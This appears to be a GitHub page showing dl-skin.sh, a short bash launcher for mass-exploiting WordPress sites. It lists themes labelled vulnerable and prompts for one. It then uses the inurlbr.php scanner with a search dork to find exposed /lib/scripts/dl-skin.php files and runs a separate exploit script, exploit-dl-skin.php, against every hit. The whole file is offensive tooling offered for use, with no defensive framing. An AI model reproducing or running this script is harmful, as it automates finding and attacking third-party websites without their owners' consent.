-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathdl-skin.sh
19 lines (19 loc) · 952 Bytes
/
dl-skin.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/bash
clear
echo
echo -e "
________________________________________________________________
| *** \e[1;32mvulnerable Themes\e[0m *** |
| infocus - awake - elegance - barracudafx - Minamaze_Pro |
| Melos_Pro - versatile - construct - dejavu - persuasion |
| fusion - mesocolumn |
|________________________________________________________________|
";
echo -n " "
echo -e " \e[1;32m # \e[0m \e[1;44mYOUR Theme?\e[0m \e[1;32m #\e[0m"
echo -n " "
echo
echo -n " "
read Theme
echo
gnome-terminal -x sh -c "php inurlbr.php --dork 'index of /'$Theme'/lib/scripts/dl-skin.php' -q 1,2,3,5,6 -s dl-skin.txt --ifurl 'lib/scripts' --exploit-command '/wp-content/themes/'$Theme'/lib/scripts/dl-skin.php ' --command-all 'php exploit-dl-skin.php _TARGET__EXPLOIT_' "$@"; exec bash"